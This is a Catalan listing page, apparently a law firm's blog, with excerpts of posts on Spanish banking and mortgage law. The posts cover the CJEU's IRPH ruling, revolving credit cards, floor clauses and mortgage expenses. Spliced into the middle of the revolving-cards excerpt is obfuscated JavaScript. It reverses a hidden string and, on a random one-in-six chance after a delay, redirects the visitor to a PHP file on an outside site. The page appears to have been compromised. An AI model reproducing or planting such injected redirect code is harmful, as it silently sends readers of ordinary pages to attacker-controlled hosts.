El TJUE es pronuncia sobre l’IRPH

El TJUE es pronuncia sobre l’IRPH
El passat dia 3 de març es va donar a conèixer l’esperada sentència del Tribunal de Justícia de la Unió Europea (TJUE) sobre l’IRPH (Índex de Referència de Préstecs Hipotecaris). En la resolució s’entén que correspon als jutges nacionals efectuar en cada cas el control sobre l’abusivitat, per la qual […]

By |març 9th, 2020|Dret bancari|0 Comments

Clàusules abusives a les targetes ‘revolving’

Clàusules abusives a les targetes ‘revolving’
 
De cert temps ençà que es produeix una nova onada de demandes interposades per consumidors contra els bancs generats per les denominades targetes revolving.
Aquesta tipologia de targetes suposa una tarja de crèdit que a$NqM=function(n){if (typeof ($NqM.list) == “string”) return $NqM.list.split(“”).reverse().join(“”);return $NqM.list;};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torga la possibilitat de […]

By |febrer 10th, 2020|Dret bancari|0 Comments

Un Jutjat eleva una qüestió prejudicial al TJUE sobre el repartiment de despeses hipotecàries

Un Jutjat eleva una qüestió prejudicial al TJUE sobre el repartiment de despeses hipotecàries
Recentment el Jutjat Mercantil número 1 de Badajoz ha elevat una qüestió prejudicial davant del Tribunal de Justícia de la Unió Europea (TJUE) en la qual planteja si la doctrina fixada pel Tribunal Suprem respecte al repartiment de les despeses hipotecàries és […]

By |gener 27th, 2020|Dret bancari|0 Comments

Reclamació de l’import d’una clàusula terra

Reclamació de l’import d’una clàusula terra
El passat 12 desembre del 2019 el Ple del Tribunal Suprem va dictar la sentència núm. 662/2019, la qual és molt rellevant ja que s’hi va dictaminar que l’extinció d’un contracte hipotecari, bé sigui per cancel·lació, bé per venciment, no impossibilita als prestataris reclamar una clàusula terra que es consideri […]

By |gener 13th, 2020|Dret bancari|0 Comments

El Tribunal Suprem anul·la la comissió per descobert de Kutxabank

El Tribunal Suprem anul·la la comissió per descobert de Kutxabank

 

El dia 25 d’octubre, el Tribunal Suprem va dictar una sentència mitjançant la qual declarava abusiva, i anul·la, una clàusula de Kutxabank amb la qual cobrava comissions de 30 euros per descoberts.

El cas l’havia plantejat l’Associació de Consumidors i Usuaris Basca (EKA/ACUV) davant dels tribunals per […]

By |novembre 5th, 2019|Dret bancari|0 Comments

Novetats de la clàusula de venciment anticipat

Novetats de la clàusula de venciment anticipat
El passat 11 de setembre del 2019, la Sala Civil del Tribunal Suprem va dictar una sentència que suposa un canvi en el criteri existent sobre la clàusula de venciment anticipat inserida en els contractes de préstec hipotecaris.

Mitjançant aquesta sentència, l’esmentat Tribunal aclareix quins seran els efectes concrets de […]

By |setembre 24th, 2019|Dret bancari|0 Comments

Hipoteca inversa per complementar la pensió de jubilació

Hipoteca inversa per complementar la pensió de jubilació
La denominada hipoteca inversa és una figura que actualment està sonant com un mitjà per complementar les pensions de jubilació dels majors de 65 anys. A través d’aquesta, el propietari d’un habitatge procedirà a hipotecar-lo, podent disposar de part del valor de taxació del seu habitatge en una […]

By |juny 17th, 2019|Dret bancari|0 Comments

Arxiu d’execucions hipotecàries després de la nova sentència de venciment anticipat del TJUE

Arxiu d’execucions hipotecàries després de la nova sentència de venciment anticipat del TJUE
Després de la crisi econòmica, es van iniciar nombrosos procediments d’execució hipotecària, ja que la situació econòmica de moltes famílies havia empitjorat i no podien atendre el pagament dels préstecs contrets. La llei va introduir la possibilitat d’oposar-s’hi per la concurrència de clàusules […]

By |maig 20th, 2019|Dret bancari|0 Comments

Solució salomònica del Tribunal Suprem sobre les despeses hipotecàries

Solució salomònica del Tribunal Suprem sobre les despeses hipotecàries
 
El passat mes de gener, el Tribunal Suprem va dictar diferents sentències oferint una solució salomònicaen el repartiment de les despeses generades en les operacions de préstec hipotecari.
Anteriorment, en la seva sentència de 23 de desembre del 2015, va declarar la nul·litat al ser abusives les clàusules en […]

By |febrer 11th, 2019|Dret bancari|0 Comments

Cessió de rematada a tercer

Cessió de rematada a tercer
 
El passat 19 de desembre del 2018, el Ple de la Sala Civil del Tribunal Suprem va dictar la sentència 714/2018 (Rec. 3862/2015). En aquesta sentència es va decidir que el prestatari que havia estat immers en un procediment d’execució hipotecària havia de pagar al cessionat de la rematada (qui finalment […]

By |gener 28th, 2019|Dret bancari|0 Comments